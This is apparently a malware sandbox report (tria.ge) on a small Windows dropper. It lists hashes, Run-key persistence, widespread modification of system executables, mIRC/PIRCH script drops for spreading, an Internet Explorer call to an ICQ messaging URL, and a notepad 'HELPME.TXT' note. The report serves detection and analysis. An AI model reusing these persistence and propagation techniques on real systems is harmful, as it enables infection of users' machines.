Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
24/05/2024, 18:06
Static task
static1
Behavioral task
behavioral1
Sample
010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe
Resource
win10v2004-20240426-en
General
-
Target
010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe
-
Size
26KB
-
MD5
918a6b9b6dfc81bfe266130ad30b21ad
-
SHA1
aa0bd70c8291b5d76d001cb17e4cb3ea6129fe7e
-
SHA256
010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7
-
SHA512
995b973b5cb0603c201bc83ce496c08edfdeb12cd6b62350a409d87ea678808c909133b1387fbe511ac0ccd4fbbb14d1637d346f2eaa9e7c47030ae079bc7380
-
SSDEEP
768:qq3G3q83wdv7GLGS1R9TNoINEx9jnhwrw:Jkq83wdv7Gti
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation Krnl32.exe Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe -
Executes dropped EXE 1 IoCs
pid Process 1000 Krnl32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WinKernel = "C:\\Users\\Admin\\AppData\\Local\\Temp\\010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe" 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WinKernel = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Krnl32.exe" Krnl32.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\CameraSettingsUIHost.exe Krnl32.exe File created C:\Windows\SysWOW64\cmdl32.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\control.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dfrgui.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dllhost.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\at.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\choice.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\clip.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\cscript.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\diskpart.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\chkntfs.exe Krnl32.exe File created C:\Windows\SysWOW64\cmmon32.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\fltMC.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\cmd.exe Krnl32.exe File created C:\Windows\SysWOW64\cmstp.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dccw.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\DevicePairingWizard.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dpapimig.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\attrib.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\autoconv.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\ComputerDefaults.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\ctfmon.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dllhst3g.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\esentutl.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\explorer.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\appidtel.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dialer.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\Dism\DismHost.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\fixmapi.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\extrac32.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\autochk.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\bitsadmin.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\Com\MigRegDB.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\compact.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\DpiScaling.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\bootcfg.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\chkdsk.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\colorcpl.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\DWWIN.EXE Krnl32.exe File opened for modification C:\Windows\SysWOW64\BackgroundTransferHost.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\EaseOfAccessDialog.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\ByteCodeGenerator.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\cmstp.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dxdiag.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\CertEnrollCtrl.exe Krnl32.exe File created C:\Windows\SysWOW64\dvdplay.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\agentactivationruntimestarter.exe Krnl32.exe File created C:\Windows\SysWOW64\certutil.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\charmap.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dtdump.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\regedit.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\AtBroker.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\CredentialUIBroker.exe Krnl32.exe File created C:\Windows\SysWOW64\cscript.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\ddodiag.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\driverquery.exe Krnl32.exe File created C:\Windows\SysWOW64\bthudtask.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\cleanmgr.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\cmdkey.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\convert.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\dplaysvr.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\Com\comrepl.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\comp.exe Krnl32.exe File opened for modification C:\Windows\SysWOW64\cmmon32.exe Krnl32.exe -
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\mirc\script.ini Krnl32.exe File opened for modification C:\Program Files\mirc\ \.dcc send $nick Krnl32.exe File opened for modification C:\Program Files\pirch98\pirch98.ini Krnl32.exe File opened for modification C:\Program Files\pirch98\events.ini Krnl32.exe -
Drops file in Windows directory 44 IoCs
description ioc Process File opened for modification C:\Windows\SystemApps\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Win32WebViewHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\BioEnrollmentHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.AddSuggestedFoldersToLibraryDialog_cw5n1h2txyewy\AddSuggestedFoldersToLibraryDialog.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\CallingShellApp.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\CapturePicker.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\OOBENetworkConnectionFlow.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\SecureAssessmentBrowser.exe Krnl32.exe File opened for modification C:\Windows\bfsvc.exe Krnl32.exe File opened for modification C:\Windows\explorer.exe Krnl32.exe File opened for modification C:\Windows\hh.exe Krnl32.exe File opened for modification C:\Windows\Speech\Common\sapisvr.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\AppResolverUX.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\PeopleExperienceHost.exe Krnl32.exe File opened for modification C:\Windows\HelpPane.exe Krnl32.exe File opened for modification C:\Windows\splwow64.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\AccountsControlHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AssignedAccessLockApp.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FilePicker_cw5n1h2txyewy\FilePicker.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\ParentalControls_cw5n1h2txyewy\WpcUapApp.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\CameraBarcodeScannerPreview.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\NcsiUwpApp_8wekyb3d8bbwe\NcsiUwpApp.exe Krnl32.exe File created C:\Windows\hh.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Microsoft.AAD.BrokerPlugin.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\FileExplorer.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\PinningConfirmationDialog.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\XBox.TCUI.exe Krnl32.exe File opened for modification C:\Windows\Boot\PCAT\memtest.exe Krnl32.exe File opened for modification C:\Windows\servicing\TrustedInstaller.exe Krnl32.exe File opened for modification C:\Windows\sysmon.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.AsyncTextService_8wekyb3d8bbwe\Microsoft.AsyncTextService.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\OOBENetworkCaptivePortal.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\XGpuEjectDialog.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Krnl32.exe File opened for modification C:\Windows\notepad.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\Microsoft.ECApp_8wekyb3d8bbwe\Microsoft.ECApp.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClipping\ScreenClippingHost.exe Krnl32.exe File opened for modification C:\Windows\SystemApps\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\UndockedDevKit.exe Krnl32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Main Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing Iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000150dfb3d7d297149b53fa5015b24f84400000000020000000000106600000001000020000000a6d83c555f8a6c83b1cc4394270828c38da9355e5533b3792f7da7f5a070f131000000000e8000000002000020000000d2a5725319f80ae86479f0e87d45db0a7ad15bc08d15dd48471b8007605be821200000009c5bbe91eda2dff9af3ceecbc24420d739368807e087d72cfb3514e33e25e45e40000000ef031cfefafa304e237b5b7b5c4174beca50c590e96a1fddfb6d6195ccb3c509434bcc96053327b5e40d80f9ffac94ddd7dbb392d742b3601b64d07d6d656d91 Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" Iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0433e5305aeda01 Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31108613" Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1360972622" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108613" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423339025" Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1360660144" Iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive Iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" Iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31108613" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\DomainSuggestion Iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31108613" Iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000150dfb3d7d297149b53fa5015b24f84400000000020000000000106600000001000020000000d175e64b2ae4b553b898b1f6d87a5a905fd5b73a241989f13bbd612951f84f80000000000e800000000200002000000097746a355a9c8cea27a4314c8bb8d745d24731b9736556001245e6ff0a5f3d42200000000ea185a457314a6a2853c374db837b1a74a6bb954966f7491cf719846c8ad233400000002d5d42c698fe353c26778357a301912278ec47f64ad1a920ba3ba09b31a8219ff57a745f031461e10899abc23c594a714343bc90d62b165a60388e13adc1f918 Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1360660144" Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1360972622" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0089395305aeda01 Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{7CA6F0CC-19F8-11EF-B865-423B00633FB2} = "0" Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery Iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\VersionManager Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames Iexplore.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ Iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4820 NOTEPAD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2476 Iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2476 Iexplore.exe 2476 Iexplore.exe 764 IEXPLORE.EXE 764 IEXPLORE.EXE 764 IEXPLORE.EXE 764 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2688 wrote to memory of 1000 2688 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe 83 PID 2688 wrote to memory of 1000 2688 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe 83 PID 2688 wrote to memory of 1000 2688 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe 83 PID 2688 wrote to memory of 4820 2688 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe 84 PID 2688 wrote to memory of 4820 2688 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe 84 PID 2688 wrote to memory of 4820 2688 010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe 84 PID 1000 wrote to memory of 2476 1000 Krnl32.exe 95 PID 1000 wrote to memory of 2476 1000 Krnl32.exe 95 PID 2476 wrote to memory of 764 2476 Iexplore.exe 96 PID 2476 wrote to memory of 764 2476 Iexplore.exe 96 PID 2476 wrote to memory of 764 2476 Iexplore.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe"C:\Users\Admin\AppData\Local\Temp\010565e86b027a3ca698879ce968900c706ac328ddb81e29adbb092598ef61f7.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\Krnl32.exe"C:\Users\Admin\AppData\Local\Temp\Krnl32.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Program Files\Internet Explorer\Iexplore.exe"C:\Program Files\Internet Explorer\Iexplore.exe" http://wwp.icq.com/scripts/WWPMsg.dll?from=M4TrIx&fromemail=_&subject=MATRIX&body=THE%20MATRIX%20HAS%20COME...&to=90019603%20HTTP/1.03⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2476 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:764
-
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\HELPME.TXT2⤵
- Opens file in notepad (likely ransom note)
PID:4820
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5ba208409d758d248b5c43be99023d903
SHA1e8ff44158a1a41784ff773aee0410fce08ffa85b
SHA25690052b1f97e33e41422ee5bdf739a18a7c66b30c282ea309314b68bbc7c093c1
SHA512a4c64d8f86d4e2533b7462a3ec5d072f059573d6937c9c4133b61ea14fdb691075a0c28f839d1a54cbc739477d3ef38995439d57308270ddbe670e5e40e5a27c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD58b5c4e0e37fe32c03e258e7536124eb5
SHA164cd7881745d2300dede3e00cedf65070b90fa21
SHA256c91871a6c1413323ab4c5ef51c51fb30c8c30e003c98f2c3bbb25b5a1e985570
SHA512205b9329791b3e5dee905c2609c2f1f0b07e8fe202ba3a55a0f68779466b7533c03b8489912210ddd307d5e161ef51a451af55c1e67c3a83b731c06da82782ce
-
Filesize
15KB
MD51a545d0052b581fbb2ab4c52133846bc
SHA162f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize
4KB
MD532d3f10595b13387eb94fac3fbe9bc87
SHA1aa6ba1fe8fdfe7aae1caae79b37105e627e4e3a2
SHA25607c6e435423a4b2f937afa5aa2e32edd92a32a877653053e5451a63fd6bd8fca
SHA512a10e54ddf0b396fade631d57f55c2df4ff916ffe4d5738e80c34b8767c8299740b1b74a85849f72d78f2704134cd7f2dac389d48644de00923fd9535406c8353
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
4KB
MD5e9dbf6c742169ea700f8386bf639911b
SHA12fce93e1b217283c3d7c8ef275748ad69f840815
SHA2563ce3371ecd679c4e218474046aa2a2ab067dbac5370b983aa8e7d91b208d816b
SHA5122809218b84cda633e6c5c2e47d8d65c23c1ea05a88b5ee970c6bc6265223ef6e94f0d30605e1f15601ecdc68700eca299990314468a37109cac87b30c575d234
-
Filesize
41KB
MD5ee39185389dd344b465d52a2b00c24f4
SHA16391a8ec25edaf66de92720e113576892e92f149
SHA256048b8193d25d826641ce4de886572d782f6b97da86e8c4549bc3fd5517ec8085
SHA512e0897211866962072dfda695de412c58c424fea36787e39944decadd84029b2e9db58ae3107e1660a366e46cb8313bab114a36a0095031b474699fd184be6c76
-
Filesize
67B
MD5057798d389930107a381a2690141ac1d
SHA1e44f1c2475c0f2323507e141dcae53ffef51c624
SHA2565ba8c75f08589b808a6e16225ea565734aeeb23edc40894174d2d135f5e8d3d2
SHA51298b40b6a11027974b482cb645718d34c8ee707ad01d6eba05acbf15a3b8d7c762afc08fef6513623fefe6e297d77a838fbb980d944a4a8e864356dfabac473e2
-
Filesize
26KB
MD5145a5b7214de87604328f3001b44ceff
SHA1a6b6a25391cb90b6897337c2416c417fdc29890f
SHA25690bd359735e86d5e47107a7a1aa2f4356e347d01565acb39e4c35ce1b50d8075
SHA5129a74d74284ef8ca07e8215f3ceb7501666cda5a7d1d8a3baf70c92d9097a2157f979b976f2b0671a8663a61077341ac03ca8b845c06d82a51bfb9b6b031d7ee4